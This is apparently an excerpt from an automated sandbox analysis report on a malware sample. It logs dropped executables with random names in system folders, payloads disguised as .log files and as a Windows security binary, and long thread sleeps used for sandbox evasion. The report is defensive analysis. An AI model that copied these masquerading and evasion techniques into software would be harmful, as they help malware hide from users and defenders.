                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598333
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597760
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597625
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597500
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596471
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596094
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595953
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595819
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595703
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595593
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595484
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595375
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595265
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595142
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595015
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594906
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594793
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594578
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594468
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594250
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594140
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594030
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593921
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593751
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593424
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593187
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593078
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592969
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592844
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592624
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592515
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592406
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592172
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592062
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591951
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591843
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591618
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWindow / User API: threadDelayed 3278
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWindow / User API: threadDelayed 6415
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\AjJOuhvp.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LsbmIiGn.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\KSdeeKAW.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\atZTrSKs.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BJIWYGBF.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\qeNySdhc.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\mEBzyVHW.logJump to dropped file
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\sgzhoMlY.logJump to dropped file
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23511
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 5772Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -35971150943733603s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599840s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599646s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -599109s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598984s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598875s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598687s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598469s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3052Thread sleep time: -300000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -598333s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597922s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597760s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597625s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597500s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3052Thread sleep time: -25200000s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -597359s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596875s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596471s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596281s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -596094s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595953s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595819s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595703s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595593s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595484s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595375s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595265s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595142s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -595015s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594906s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594793s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594687s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594578s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594468s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594359s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594250s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594140s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -594030s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593921s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593751s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593424s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593297s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593187s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -593078s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592969s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592844s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592734s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592624s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592515s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592406s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592297s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592172s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -592062s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591951s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591843s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591734s >= -30000s
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6340Thread sleep time: -591618s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6388Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 6748Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 6280Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe TID: 1700Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe TID: 3288Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008AA69B
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008BC220
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BE6A3 VirtualQuery,GetSystemInfo,0_2_008BE6A3
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599840
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599646
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 599109
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598984
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598469
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 598333
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597760
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597625
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597500
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 597359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596875
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596471
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 596094
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595953
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595819
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595703
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595593
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595484
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595375
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595265
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595142
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 595015
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594906
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594793
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594687
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594578
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594468
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594359
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594250
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594140
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 594030
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593921
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593751
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593424
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593187
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 593078
